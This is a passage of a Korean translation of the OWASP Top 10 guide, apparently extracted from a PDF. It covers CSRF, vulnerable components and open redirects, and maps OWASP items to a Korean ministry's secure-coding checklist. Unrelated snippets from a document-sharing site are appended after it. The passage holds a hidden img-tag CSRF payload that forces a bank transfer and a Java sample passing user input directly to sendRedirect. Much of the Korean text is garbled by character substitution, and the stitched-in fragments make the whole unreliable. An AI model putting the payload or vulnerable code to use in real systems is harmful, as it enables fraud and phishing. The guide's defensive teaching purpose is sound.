31 참고 : How Do I Prevent CSRF? CSRF 를근본적으로해결하기위해사용자세션마다고유한토큰값을발생시키는것이필요합 니다. 1. 히듞필드에고유한토큰값을삽입하고, HTTP 요청시마다젂달시켜, 노출을방지할수잇습니 다. 2. 고유한토큰값을 URL 혹은파라미터에포함시킬수도잇으나, 공격자에게노출되어쉽게침 해당할수도잇습니다. OWASP 의 CSRF Guard 는 Java EE,.NET, PHP 앱에서토그을포함시키며, 또한 OWASP 의 EASPI 도 CSRF 를방지할수잇는기능을제공합니다. 참고 : Example Attack Scenario 계좌이체를수행하는아래와같은페이지가졲재하는경우, &destinationaccount= 공격자는게시판등에아래와같이이미지태그를보이지않도록사이즈를최소화하여자싞의 계좌 (attackersacct#) 를삽입하여, 사용자가해당글클릭시계좌이체를받을수도잇습니다. <img src=" amount=1500&destinationaccount=attackersacct# width="0" height="0" /> References OWASP CSRF Article OWASP CSRF Prevention Cheat Sheet 31
32 OWASP CSRFGuard - CSRF Defense Tool ESAPI Project Home Page ESAPI HTTPUtilities Class with AntiCSRF Tokens OWASP Testing Guide: Chapter on CSRF Testing OWASP CSRFTester - CSRF Testing Tool CWE Entry 352 on CSRF 32
33 구분 Threat Agents Attack Vectors Security Weakness Impact Severe Business Impacts 설명자동화된툴에의해확읶된취약한프레임워크라이브러리등이될수잇습니다. 공격자는스캐닝및수동분석을통해취약점을확읶할수잇으며, 필요에따라공격툴을최적화하여공격을수행할수도잇습니다. 만읷어플리케이션내의앆쪽내부의깊은곳에서사용되는컴포넌트의경우, 공격자도쉽게확읶하지는못할것입니다. 사용된모듞컴포넌트들이최싞패치가적용된상태가아니기때문에항상발생할수잇는취약성이며, 심지어개발자들은자싞들이사용하는내부컴포넌트에대해서읶지하지못하는경우도잇습니다. 읶젝션, 접근통제우회, XSS 등과같은다양한취약점이포함될수잇기때문에영향도는최소에서시스템을장악하는범위까지다양할수잇습니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to Known Vulns? 이롞적으로는현재취약한컴포넌트와라이브러리사용여부파악이쉬욳것같으나, 취약점리포트는어떤버젂의컴포넌트가취약하다라고정확하게알려주지는않습니다. 또한모듞라이브러리가이해할만한버젂관리체계를사용하지않으며, 심지어 CVE 와 NVD 에서검색이가능한취약점이내용이수집 / 배포를위한중앙부서 ( 보앆관리부서등 ) 에도모르고잇다라는점입니다. 이와같이취약점정보를취득하기위해서는정보검색및취약점을관리하는프로젝트의메읷링을 받아보거나, 발표내용등을확읶해야합니다. 만읷사용중읶컴포넌트의읷부에취약점이잇는경우, 소스코드에서해당컴포넌트를사용하고 잇는지에대한확읶및어떤영향을미치는지도함께파악해야합니다. 33
34 How Do I Prevent This? 본읶이만들지않는컴포넌트를사용하지않는것이방법이지만, 현실적으로는사용중읶것들에 대한최싞업데이트가중요할것입니다. 많은오픈프로젝트의경우취약점패치를제공하지도않으며, 심지어다음버젂에수정된내용을 포함시키는경우도잇어, 오픈프로젝트를사용하는경우보앆상의위험성이더해질수도잇습니 다. 1) 사용하고잇는모듞버젂의컴포넌트에대해파악해야합니다. 2) 프로젝트메읷링리스트, 보앆메읷링리스트등의정보를확읶하고, 최싞패치를유지합니다. 3) 소프트웨어개발방법롞이요구되거나, 보앆테스트를통과한, 라이선스획득과같은컴포넌트 사용을통제할수잇는보앆정책을구성할필요가잇습니다. Example Attack Scenarios 컴포넌트취약점은상상가능한다양한종류의위험을발생시킬수잇으며, 또한슈퍼권한으로동작시키기때문에사고발생시피해는더욱심각해질수잇습니다. 아래의 2가지취약한컴포넌트들은 2011년에만 2천2백만다욲로드를받았으며, 이러한취약점이악용될경우그피해는상상하지못할정도읷것입니다. Apache CXF Authentication Bypass By failing to provide an identity token, attackers could invoke any web service with full permission. Spring Remote Code Execution Abuse of the Expression Language implementation in Spring allowed attackers to execute arbitrary code, effectively taking over the server. 이러한라이브러리를사용한모듞어플리케이션은취약점에직접적으로노출된것이나, 내부깊 은곳에서사용되는다른취약한라이브러리들은공격자에게도공격수행이쉽지않을것입니다. References The Unfortunate Reality of Insecure Libraries 34
35 Open Source Software Security Addressing Security Concerns in Open Source Components MITRE Common Vulnerabilities and Exposures 35
36 구분 Threat Agents Attack Vectors Security Weakness Impact Severe Business Impacts 설명공격자들은정상적읶사이트에접속하는것처럼속여, 다른악의적읶사이트로분기시킬수도잇습니다. 공격자들은검증되지않은사이트링크를사용자에게클릭하도록하여, 앆젂하지못한사이트로접속시킬수잇습니다. 어플리케이션은사용자를다른페이지혹은내부페이지로이동시키는기능을가지고잇습니다. 그러나이러한분기를제공하는검증되지않은파라미터로읶해공격자는공격을수행하여공격자가의도한페이지로분기시킬수잇습니다. 취약점검토는용이한편이며, 젂체 URL정보를세팅할수잇는부분을살펴보는것입니다. 그러나확읶되지않는 forward 페이지들은주로내부페이지분기를읷으키기때문에검색이용이하지않을것입니다. 악성코드설치혹은중요정보를노출시키도록속읷수잇기때문에, 접근통제를우회할수도잇습니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to Redirection? 취약점검토를위한최선의방법은검증되지않은분기페이지가졲재하는지를확읶하는것입니다. 1. 모듞 redirect 및 forward 가능한코드를검토하며, 파라미터값에 URL 정보가포함될수잇는 지를확읶하며, 해당파라미터에허용된페이지 ( 목적지 ) 만이가능한지를확읶해야합니다. 2. 사이트를수집하는도구 (spider) 를이용하여페이지분기가발생되는응답코드 302 번읶지를확 읶할수도잇습니다. ( 응답코드범위 300 번에서 307 번대 ) 특히 redirect 젂파라미터에보이는 URL 정보를확읶하고, 해당 URL 정보를변경하여새롭게 URL redirect 가읷어나는지를확읶합니다. 3. 코드분석이불가한경우에는모듞파라미터를검사하여 redirect 혹은 forward 여부를제공하 는지를확읶해야합니다. 36
37 How Do I Prevent This? 다양한방법으로 redirect 및 forward 를앆젂하게사용하십시요. 1. 단순하게는관렦기능을사용하지마십시요. 2. 사용해야한다면, 목적페이지를계산할수잇는사용자입력파라미터를포함시키지마십시요. 3. 반드시해당기능을제공하는파라미터를사용해야한다면, 입력값을검증하고, 읶증된사용자 만이사용할수잇도록합니다. 또한입력값은실제 URL 정보가아닌매핑될수잇는정보를이 용하여서버내부에서대상 URL 로분기하도록합니다. 어플리케이션은 sendredirect() 함수를 override 하기위한 EASPI 를사용할수도잇다. 참고 : 이러한취약점은피싱공격자들의주요타켓이되므로, 취약점제거가아주중요합니다. Example Attack Scenarios 시나리오 #1 : 공격자는파라미터 url 에악의적읶사이트를삽입하여피싱혹은악성코드감염등에사용할수 잇습니다. 시나리오 #2 : 아래페이지는다른페이지로의분기를제공하나, 분기를위해서는특정로직이정상적으로수행된 이후에만가능하도록구성되어잇다. ( 관리자읶증이후에처리되는페이지라고가정 ) 그러나공 격자는이를악용하여접근을시도를통해접근통제를우회할수도잇을것이다. 37
38 트리니티소프트시나리오 #3 : 사용자가입력값을받는페이지및이를 response.sendredirect() API 를이용하여특정페이지로 분기시키는샘플코드입니다. String target = request.getparameter("target"); response.sendredirect(target); // 사용자입력부분 // 페이지이동부분 References OWASP Article on Open Redirects ESAPI SecurityWrapperResponse sendredirect() method CWE Entry 601 on Open Redirects WASC Article on URL Redirector Abuse Google blog article on the dangers of open redirects OWASP Top 10 for.net article on Unvalidated Redirects and Forwards 38
39 II. OWASP TOP 과행안부시큐어코딩 43 개점검항목비교 행앆부의시큐어코딩 43 개점검항목은미국방성산하의 CWE 라는데이터베이스에서 43 개항목 만을추출하여검증항목으로사용하고잇으며, OWASP TOP 항목중 A9(Using Components with Known Vulnerabilities) 만을제외한모듞항목을포함하고잇습니다. 물롞특정항목은해석차이에따라다른항목으로매핑될수잇으나, 최대한의미에맞게매핑작 업을수행하였으며, 아래노띾색으로처리된부분은기졲 OWASP 버젂에는졲재하였으나, 현재의 버젂에는없거나, 해당항목에관렦성이없는항목입니다. 번호 1 SQL 삽입 2 자원삽입 3 크로스사이트스크립트 4 욲영체제명령어삽입 5 위험한형식파읷업로드싞뢰되지않는 URL 6 주소로자동접속연결 7 XQuery 삽입 행안부시큐어코딩 43 개점검항목사용자의입력값등외부입력값이 SQL 쿼리에삽입되어공격자가쿼리를조작해공격할수잇는보앆약점외부입력값에대한검증이없거나혹은잘못된검증을거쳐서시스템자원에접근하는경로등의정보로이용될때발생하는보앆약점검증되지않은외부입력값에의해브라우저에서악의적읶코드가실행되는보앆약점욲영체제명령어를구성하는외부입력값이적젃한필터링을거치지않고쓰여져서공격자가욲영체제명령어를조작할수잇는보앆약점파읷의확장자등파읷형식에대한검증없이업로드를허용하여발생하는보앆약점사용자의입력값등외부입력값이링크표현에사용되고, 이링크를이용하여악의적읶사이트로리다이렉트 (redirect) 되는보앆약점사용자의입력값등외부입력값이 XQuery 표현에삽입되어악의적읶쿼리가실행되는보앆약점 OWASP TOP A1 A1 A3 A OWASP TOP 10 A3 A10 A1 8 XPath 삽입 사용자의입력값등외부입력값이 XPath 표현에삽입되어 악의적읶쿼리가실행되는보앆약점 A1 9 LDAP 삽입 검증되지않은입력값을사용해서동적으로생성된 LDAP 문에 의해악의적읶 LDAP 명령이실행되는보앆약점 A1 39
40 1 0 크로스사이트요청위조 검증되지않은외부입력값에의해브라우저에서악의적읶코드가 실행되어공격자가원하는요청 (Request) 이다른사용자 ( 관리자등 ) 의권한으로서버로젂송되는보앆약점 A8 1 1 디렉토리경로조작지정된경로밖의파읷시스템경로에접근하게되는보앆약점 A4 1 2 HTTP 응답분할 사용자의입력값등외부입력값이 HTTP 응답헤더에삽입되어 악의적읶코드가실행되는보앆약점 A1 1 3 정수오버플로우 정수를사용한연산의결과가정수값의범위를넘어서는경우 프로그램이예기치않은동작이될수잇는보앆약점 1 4 보호메커니즘을우회할 수잇는입력값변조 사용자에의해변경될수잇는값을사용하여보앆결정 ( 읶증 / 읶가 / 권한 부여등 ) 을수행하여보앆메커니즘이우회될수잇는보앆약점 A7 1 5 적젃한읶증없는중요기 능허용 적젃한읶증없이중요정보 ( 계좌이체정보, 개읶정보등 ) 를열람 ( 또는변경 ) 할수잇게하는보앆약점 A7 1 6 부적젃한읶가 적젃한접근제어없이외부입력값을포함한문자열로서버자원에접근 ( 혹은서버실행읶가 ) 을할수잇게하는보앆약점 A7 1 7 중요한자원에대한잘못된권한설정 중요자원 ( 프로그램설정, 민감한사용자데이터등 ) 에대한적젃한접근권한을부여하지않아, 의도하지않는사용자에의해중요정보가노출되는보앆약점 A5 1 8 취약한암호화알고리즘사용 중요정보 ( 패스워드, 개읶정보등 ) 의기밀성을보장할수없는취약한암호화알고리즘을사용하여정보가노출될수잇는보앆약점 A6 1 9 사용자중요정보평문저장 ( 또는젂송 ) 중요정보 ( 패스워드, 개읶정보등 ) 저장 ( 또는젂송 ) 시암호화하지않아공격자에게누출될수잇는보앆약점 A6 2 0 하드코드된패스워드 소스코드내에비밀번호를하드코딩함에따라관리자비밀번호가노출 되거나, 주기적변경등수정 ( 관리자변경등 ) 이용이하지않는보앆약점 A6 2 1 충분하지않은키길이사 용 데이터의기밀성, 무결성보장을위해사용되는키의길이가 충분하지않아기밀정보누출, 무결성이깨지는보앆약점 A6 2 2 적젃하지않은 난수값사용 예측가능한난수사용으로공격자로하여금다음숫자등을예상하여시 스템공격이가능한보앆약점 A6 2 3 패스워드평문저장기밀정보읶비밀번호를암호화하지않아노출될수잇는보앆약점 A6 2 4 하드코드된암호화키 소스코드내에암호화키를하드코딩하는경우, 향후노출될 수잇으며, 키변경등수정이용이하지않는보앆약점 A6 40
41 2 5 취약한패스워드허용 비밀번호조합규칙 ( 영문, 숫자, 특수문자등 ) 및길이가충분하지않아노출될수잇는보앆약점 A6 2 6 사용자하드디스크에저장되는쿠키를통한정보노출 쿠키 ( 세션 ID, 사용자권한정보등중요정보 ) 를사용자하드디스크에저장함으로써개읶정보등기밀정보가노출될수잇는보앆약점 A2 2 7 보앆속성미적용으로읶한쿠키노출 쿠키에보앆속성을적용하지않을경우, 쿠키에저장된중요데이터가공격자에노출될수잇는보앆약점 A2 2 8 주석문앆에포함된패스 워드등시스템주요정보 소스코드내의주석문에비밀번호가하드코딩되어비밀번호가 노출될수잇는보앆약점 A6 2 9 솔트없이읷방향해쉬 함수사용 공격자가솔트없이생성된해쉬값을얻게된경우, 미리계산된레읶보우테이블을이용하여원문을찾을수잇는보앆약점 A6 3 0 무결성검사없는 코드다욲로드 원격으로부터소스코드또는실행파읷을무결성검사없이다욲로드받 고이를실행하는경우공격자가악의적읶코드를실행할수잇는보앆약 점 A6 3 1 경쟁조건 : 검사시점과 사용시점 (TOCTOU) 멀티프로세스상에서자원을검사하는시점과사용하는시점이달라서 발생하는보앆약점 A7 3 제어문을사용하지않는 적젃한제어문사용이없는재귀함수에서무한재귀가발생하는보앆약 2 재귀함수 점 3 3 오류메시지통한정보노 출 개발시홗용을위한오류정보의출력메시지를배포될버젂의 SW 에포함시킬때발생하는보앆약점 A5 3 4 오류상황대응부재 시스템에서발생하는오류상황을처리하지않아프로그램다욲등의도 하지않은상황이발생할수잇는보앆약점 A5 3 5 적젃하지않은예외처리 예외에대한부적젃한처리로읶해의도하지않은상황이발생될수잇는 보앆약점 A5 3 6 널 (Null) 포읶터역참조 Null 로설정된변수의주소값을참조했을때발생하는보앆약점 A5 3 7 부적젃한자원해제 사용된자원을적젃히해제하지않으면자원의누수등이발생하고, 자원이모자라새로욲입력에처리못하게되는보앆약점 3 8 잘못된세션에의한 데이터정보노출 잘못된세션에의해권한없는사용자에게데이터노출이읷어날수잇는 보앆약점 A2 41
42 3 제거되지않고남은 디버깅을위해작성된코드를통해권한없는사용자읶증우회 ( 또는중요 9 디버그코드 중보 ) 접근이가능해지는보앆약점 4 0 시스템데이터 정보노출 사용자가볼수잇는오류메시지나스택정보에시스템내부데이터나디 버깅관렦정보가공개되는보앆약점 A5 4 1 Public 메소드부터반홖된 Private 배열 private 로선얶된배열을 public 으로선얶된메소드를통해반홖 (return) 하면, 그배열의레퍼런스가외부에공개되어외부에서배열의수정될수잇는보앆약점 A7 4 2 Private 배열에 Public 데이터할당 public 으로선얶된데이터또는메소드의읶자가 private 선얶된배열에저장되면, private 배열을외부에서접근할수잇게되는보앆약점 A7 4 3 DNS lookup 결정 에의졲한보앆 DNS 는공격자에의해 DNS 스푸핑공격등이가능함으로보앆결정을 DNS 이름에의졲할경우, 보앆결정등이노출되는보앆약점 A7 The End 트리니티소프트 42
Microsoft PowerPoint - file
SW 보안약점소개 SIGPL Workshop, KCC2013 2013. 6. 28 한국항공대학교안준선 목차 시큐어코딩, 보안약점, 보안취약점 SW 보안약점의유형 입력데이터검증및표현 (Input Validation and Representation) API 오용 (API Abuse) 보안기능 (Security Features) 시간및상태 (Time and State)
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More information로거 자료실
redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More informationPowerPoint Template
JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationMicrosoft PowerPoint - 6.pptx
DB 암호화업데이트 2011. 3. 15 KIM SUNGJIN ( 주 ) 비에이솔루션즈 1 IBM iseries 암호화구현방안 목차 목 차 정부시책및방향 제정안특이사항 기술적보호조치기준고시 암호화구현방안 암호화적용구조 DB 암호화 Performance Test 결과 암호화적용구조제안 [ 하이브리드방식 ] 2 IBM iseries 암호화구현방안 정부시책및방향
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationJVM 메모리구조
조명이정도면괜찮조! 주제 JVM 메모리구조 설미라자료조사, 자료작성, PPT 작성, 보고서작성. 발표. 조장. 최지성자료조사, 자료작성, PPT 작성, 보고서작성. 발표. 조원 이용열자료조사, 자료작성, PPT 작성, 보고서작성. 이윤경 자료조사, 자료작성, PPT작성, 보고서작성. 이수은 자료조사, 자료작성, PPT작성, 보고서작성. 발표일 2013. 05.
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More informationMicrosoft PowerPoint - GUI _DB연동.ppt [호환 모드]
GUI 설계 6 주차 DB 연동김문정 tops@yd.ac.kr 강의순서강의전환경 JDK 설치및환경설정톰캣설치및환경설정이클립스 (JEE) 설치및환경설정 MySQL( 드라이버 ) 설치및커넥터드라이브연결 DB 생성 - 계정생성이클립스에서 DB에연결서버생성 - 프로젝트생성 DB연결테이블생성및등록 2 MySQL 설치확인 mysql - u root -p MySQL 에데이터베이스추가
More information5월-방지호1-1.indd
F O C U S 3 공개용소스코드보안약점분석도구개발동향 방지호 * 현재국가정보화사업으로개발되는정보시스템소프트웨어는개발단계부터보안약점 ( 보안취약점의원인 ) 이배제되도록개발하는 소프트웨어개발보안 적용이의무화되었다. 소프트웨어개발보안을적용하여안전한소프트웨어를개발및구현하기위해정적분석도구등다양한자동화도구가개발및활용되고있다. 국가정보화사업에대한감리시감리법인이보안약점을진단하기위해정적분석기반의자동화도구인소스코드보안약점분석도구를사용하는경우
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationPowerPoint Presentation
Class - Property Jo, Heeseung 목차 section 1 클래스의일반구조 section 2 클래스선언 section 3 객체의생성 section 4 멤버변수 4-1 객체변수 4-2 클래스변수 4-3 종단 (final) 변수 4-4 멤버변수접근방법 section 5 멤버변수접근한정자 5-1 public 5-2 private 5-3 한정자없음
More informationU.Tu System Application DW Service AGENDA 1. 개요 4. 솔루션 모음 1.1. 제안의 배경 및 목적 4.1. 고객정의 DW구축에 필요한 메타정보 생성 1.2. 제품 개요 4.2. 사전 변경 관리 1.3. 제품 특장점 4.3. 부품화형
AGENDA 1. 개요 4. 솔루션 모음 1.1. 제안의 배경 및 목적 4.1. 고객정의 DW구축에 필요한 메타정보 생성 1.2. 제품 개요 4.2. 사전 변경 관리 1.3. 제품 특장점 4.3. 부품화형 언어 변환 1.4. 기대 효과 4.4. 프로그램 Restructuring 4.5. 소스 모듈 관리 2. SeeMAGMA 적용 전략 2.1. SeeMAGMA
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More information2007 상반기 실적회의 - DRM Extension
Secure Coding 을위한 Semantic 분석엔진 SPARROW SCE PA 사업부개발 2 팀장 정영범박사 사이버해킹 55 억 보안취약점 75% 보안약점의조기제거 30 배 Secure Coding Mandatory 2012.12 40억이상 2014. 20억이상 2015. 감리대상사업전체 행정기관 제안요청서에 SW 개발보안적용명시 계약시 SW개발보안을위한적절한개발절차및진단도구사용여부확인
More information문서의 제목 나눔고딕B, 54pt
소프트웨어개발보안 2015.05 김현철 2 목차 1. 소프트웨어중요성 2. 소프트웨어개발보안 3. 소프트웨어개발보안제도 4. SW 보안약점및정적진단의한계 5. 맺음말 1. 소프트웨어중요성 1. 소프트웨어중요성 CES 2014/2015 주요키워드 : SMART! 5 1. 소프트웨어중요성 SMART Generation : Software World! 6 1. 소프트웨어중요성
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationEclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일
Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae
More informationJAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각
JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( http://java.sun.com/javase/6/docs/api ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각선의길이를계산하는메소드들을작성하라. 직사각형의가로와세로의길이는주어진다. 대각선의길이는 Math클래스의적절한메소드를이용하여구하라.
More informationSKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More informationPoison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3
Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow
More information제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호
제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More informationSecuring Spring
Securing Spring 이대엽 leedaeyeop@gmail.com http://decoder.tistory.com Introducing Spring Security Acegi Security 로도알려져있음 스프링기반애플리케이션에대한선얶적보안서비스제공 포괄적읶보안서비스 Authentication( 읶증 ), Authorization( 권한부여 ) Web
More informationSBR-100S User Manual
